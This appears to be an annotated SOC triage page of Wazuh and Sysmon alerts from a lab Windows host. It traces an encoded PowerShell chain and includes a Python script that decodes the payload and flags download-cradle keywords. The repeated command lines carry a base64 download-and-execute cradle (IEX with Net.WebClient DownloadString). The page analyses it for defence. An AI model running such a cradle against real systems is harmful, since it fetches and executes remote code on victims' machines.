data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line, same encoded payload as the parent. It decodes (base64 of UTF-16LE) to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download-and-execute cradle. example.com is a reserved test domain, so this looks like a lab run, but the behaviour is exactly what the rule is for.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
Working directory of the new process (the user's profile root).

data.win.eventdata.user:  Attacker\Attcker1
Account the process runs as; domain part equals the hostname, so a local account.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon identifier of the logon session; same session as PID 6588.

data.win.eventdata.logonId:  0x26584
Windows Logon ID of that session; search Security 4624 for it to find the original sign-in.

data.win.eventdata.terminalSessionId:  1
Windows session number; 1 is an interactive console or RDP session.

data.win.eventdata.integrityLevel:  Medium
Token integrity level: still a standard, non-elevated user. No escalation happened across the chain.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file; identical to the earlier spawn, as expected for the same binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
processGuid of the parent: this is PID 6588 from the first Process Create alert on this page, which confirms the chain 2732 → 6588 → 13524.

data.win.eventdata.parentProcessId:  6588
PID of the parent at the time of the spawn.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent executable: PowerShell spawning PowerShell again.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line: the same encoded cradle. The payload reproduces itself one hop per spawn; the interesting question is what the fetched script does and where PID 2732 came from.

data.win.eventdata.parentUser:  Attacker\Attcker1
Account the parent runs as; unchanged across the chain.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.782+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. As with the earlier FileCreate, the targetFilename is a __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder: the benign AppLocker/WDAC probe every Windows PowerShell start writes and removes. It is a side-effect of the PID 13524 spawn above (same processGuid), not a downloaded executable; keep the alert for the spawn, not for the file.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.782+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.902531
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon, so eventID uses Sysmon's numbering.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; a stable filter key.

data.win.system.eventID:  11
Sysmon event type: 11 = FileCreate. Not a classic Security-log ID.

data.win.system.version:  2
Schema version of the FileCreate event.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon logs everything at this level.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:37.5822494Z
When the event log wrote the record (UTC); eventdata.utcTime is when Sysmon saw the create, timestamp when Wazuh alerted (roughly 74 s later, collection lag).

data.win.system.eventRecordID:  282037
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process that created the file (eventdata.processId, 13524).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in: Sysmon's own Operational channel.

data.win.system.computer:  Attacker
Hostname stamped on the record by the source; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:37.562 ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ProcessId: 13524 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_lrtfiacg.ym4.ps1 CreationUtcTime: 2025-04-24 22:35:37.562 User: Attacker\Attcker1"
Rendered message text of the Sysmon FileCreate event; the data.win.eventdata fields below are parsed out of it.

data.win.eventdata.utcTime:  2025-04-24 22:35:37.562
When Sysmon saw the file being created (UTC): 1.5 s after PID 13524 started.

data.win.eventdata.processGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
Same processGuid as the Process Create alert for PID 13524 above; that PowerShell wrote the file.

data.win.eventdata.processId:  13524
PID of the writing process.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Process that created the file.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_lrtfiacg.ym4.ps1
Path of the created file: another __PSScriptPolicyTest_<random>.<random>.ps1 in Temp, the AppLocker/WDAC probe every Windows PowerShell start writes and deletes. One of these per PowerShell spawn is expected; it is not a dropped executable. Two of them, 2.6 s apart, simply mirror the two spawns in the chain.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:37.562
Creation timestamp on the file; equal to utcTime, so a brand-new file rather than an overwrite.

data.win.eventdata.user:  Attacker\Attcker1
Account that wrote the file.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
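The four Sysmon alerts above (Process Create for PIDs 6588 and 13524, and the FileCreate each of them produced) can be triaged mechanically. The script below is an added example, not SOCscribe or Wazuh code: it decodes the -EncodedCommand payload as base64 of UTF-16LE, flags download-cradle markers in the result, joins each FileCreate to its Process Create on processGuid, walks the parent chain, and separates the __PSScriptPolicyTest_ artifact from a real file drop. The EVENTS list is constructed from the values on this page using Wazuh's data.win.eventdata field names; the marker list and the artifact regex are my own choices.

```python
import base64
import re

# The encoded payload exactly as it appears in the alerts above.
ENCODED = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\Attcker1\AppData\Local\Temp"

# Constructed from the four Sysmon alerts on this page (Wazuh eventdata field names).
EVENTS = [
    {"eventID": 1, "utcTime": "2025-04-24 22:35:33.635", "processId": 6588,
     "processGuid": "{94294ddc-bcb5-680a-9e0a-000000000e00}", "image": PS,
     "commandLine": f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENCODED}',
     "parentProcessId": 2732, "parentProcessGuid": "{94294ddc-bcb3-680a-9b0a-000000000e00}"},
    {"eventID": 11, "utcTime": "2025-04-24 22:35:34.965", "processId": 6588,
     "processGuid": "{94294ddc-bcb5-680a-9e0a-000000000e00}",
     "targetFilename": TEMP + r"\__PSScriptPolicyTest_4kimfx2r.qot.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:35:36.031", "processId": 13524,
     "processGuid": "{94294ddc-bcb8-680a-a00a-000000000e00}", "image": PS,
     "commandLine": f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENCODED}',
     "parentProcessId": 6588, "parentProcessGuid": "{94294ddc-bcb5-680a-9e0a-000000000e00}"},
    {"eventID": 11, "utcTime": "2025-04-24 22:35:37.562", "processId": 13524,
     "processGuid": "{94294ddc-bcb8-680a-a00a-000000000e00}",
     "targetFilename": TEMP + r"\__PSScriptPolicyTest_lrtfiacg.ym4.ps1"},
]

TOKEN = re.compile(r'"[^"]*"|\S+')          # quoted paths stay one token
# Download-cradle markers to look for in the decoded script (my own list).
CRADLE_MARKERS = ("iex", "invoke-expression", "net.webclient", "downloadstring",
                  "downloadfile", "invoke-webrequest", "frombase64string")
# Benign probe file Windows PowerShell writes to %TEMP% at every start (AppLocker/WDAC test).
POLICY_TEST = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None if absent.
    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc ...)
    and the value is base64 of UTF-16LE, not of UTF-8."""
    tokens = TOKEN.findall(command_line)
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:          # not base64, or odd byte count: treat as absent
                return None
    return None


def cradle_markers(script):
    """Markers present in the decoded script, in CRADLE_MARKERS order."""
    low = script.lower()
    return [m for m in CRADLE_MARKERS if m in low]


def is_policy_test_artifact(path):
    return POLICY_TEST.search(path) is not None


def triage(events):
    """One finding per EID 1: decoded payload, cradle markers, parent PID chain,
    and the files that process wrote (EID 11 joined on processGuid)."""
    creates = {e["processGuid"]: e for e in events if e["eventID"] == 1}
    written = {}
    for e in events:
        if e["eventID"] == 11:
            written.setdefault(e["processGuid"], []).append(e["targetFilename"])
    findings = []
    for guid, ev in creates.items():
        chain, cur = [ev["processId"]], ev             # child first, then ancestors
        while cur is not None:
            chain.append(cur["parentProcessId"])
            cur = creates.get(cur["parentProcessGuid"])  # None once the parent is not in the log
        decoded = decode_encoded_command(ev["commandLine"])
        files = written.get(guid, [])
        findings.append({
            "pid": ev["processId"], "chain": chain, "decoded": decoded,
            "markers": cradle_markers(decoded or ""),
            "policy_test_files": sum(is_policy_test_artifact(f) for f in files),
            "real_drops": [f for f in files if not is_policy_test_artifact(f)],
        })
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"PID {f['pid']}  chain {' <- '.join(map(str, f['chain']))}")
        print(f"  decoded: {f['decoded']}")
        print(f"  cradle markers: {f['markers']}  policy-test files: "
              f"{f['policy_test_files']}  real drops: {f['real_drops']}")
```

Run against the page's events this yields two findings, both decoding to the same DownloadString cradle, chains 6588 ← 2732 and 13524 ← 6588 ← 2732, one policy-test file each and no real drop; the rule 92213 hits therefore collapse into the two T1059.001 spawns, and the open question is what launched PID 2732.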

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:52.036+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts. Read the Logon Type before anything else: this is Type 5 (service) for S-1-5-18 SYSTEM, requested by services.exe, with no network source. That is a service starting, not a user signing in, and every Windows host emits it continuously; it matters only if this Logon ID (0x3E7, the SYSTEM session) later appears on a suspicious process. The 4624 that explains the PowerShell chain above is the one for Attcker1 with Logon ID 0x26584, not this one.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.036+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.905299
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:38.3328294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43822
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2060
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:52.389+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.389+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.912635
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:39.6375414Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:38.125 ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ProcessId: 12600 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ParentProcessId: 13524 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:38.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

